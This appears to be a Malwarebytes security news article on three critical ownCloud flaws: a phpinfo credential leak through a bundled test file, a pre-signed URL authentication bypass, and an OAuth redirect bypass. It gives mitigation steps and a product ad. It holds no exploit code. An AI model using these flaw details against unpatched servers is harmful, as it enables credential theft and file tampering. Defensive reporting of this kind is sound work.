ownCloud has warned users about three critical security flaws in its file-sharing software which, if exploited, could reveal sensitive information and modify files. An especially and potentially impactful one is a vulnerability that could lead to disclosure of sensitive credentials and configuration in containerized deployments.

ownCloud is a very widely used open-source project that allows users to host and sync files. ownCloud says on its own website that it has 200 million users, including 600 enterprises.

The vulnerabilities stem from one of the building blocks of the project.

> “The graphapi app relies on a third-party library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo).”

Microsoft’s Graph API (graphapi) is a web API that enables you to access Microsoft Cloud service resources. After you register your app and get authentication tokens for a user or service, you can make requests to the Microsoft Graph API.

A Shodan search shows many thousands of exposed services, especially in Germany and the US.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVEs of the found vulnerabilities are:

CVE-2023-49105 (CVSS score 9.8 out of 10): An issue was discovered in ownCloud _owncloud/core_ before 10.13.1. An attacker can access, modify, or delete any file without authentication if the username of a victim is known, and the victim has no signing-key configured. This occurs because pre-signed URLs can be accepted even when no signing-key is configured for the owner of the files. The earliest affected version is 10.6.0.

CVE-2023-49104 (CVSS score 9 out of 10): An issue was discovered in ownCloud _owncloud/oauth2_ before 0.6.1, when Allow Subdomains is enabled. An attacker is able to pass in a crafted redirect-url that bypasses validation, and consequently allows an attacker to redirect callbacks to a Top Level Domain (TLD) controlled by the attacker.

Redirect URLs are a critical part of the OAuth (authentication) flow. After a user successfully authorizes an application, the authorization server will redirect the user back to the application. Because the redirect URL will contain sensitive information, it is critical that the service doesn’t redirect the user to arbitrary locations.

CVE-2023-49103 (CVSS score 10 out of 10): An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When you acess this URL, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Additionally, _phpinfo_ exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system. Therefore, even if ownCloud is not running in a containerized environment, this vulnerability should still be a cause for concern. A working Proof of Concept (PoC) for this vulnerability is already available on GitHub

Ransomware operators could have a field day with this vulnerability. As they have shown in the past, they love file-sharing apps almost as much as they love admin passwords. It allows them to roam free in your network and move the stolen data to a location under their control at your expense.

**What to do**

ownCloud says you should delete the file _owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php_. Simply disabling the graphapi app won’t eliminate the vulnerability.

In newer versions, ownCloud has disabled the _phpinfo_ function in the docker-containers, promising to apply various hardenings in future core releases to mitigate similar vulnerabilities.

Then change the following:

*   Your ownCloud admin password
*   The mail server credentials
*   Database credentials
*   Object-Store/S3 access-key

Note that Docker containers from before February 2023 are not vulnerable to the credential disclosure.

If you are unable to patch right now you can disable the “Allow Subdomains” option to disable the vulnerability as a workaround for CVE-2023-49104.

As a workaround for CVE-2023-49105, you can configure the signing-key.

Instructions on how to update ownCloud can be found on its website.

**Black Friday sale**

Save 50% on our Home bundles for a limited time only!

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Tag

#docker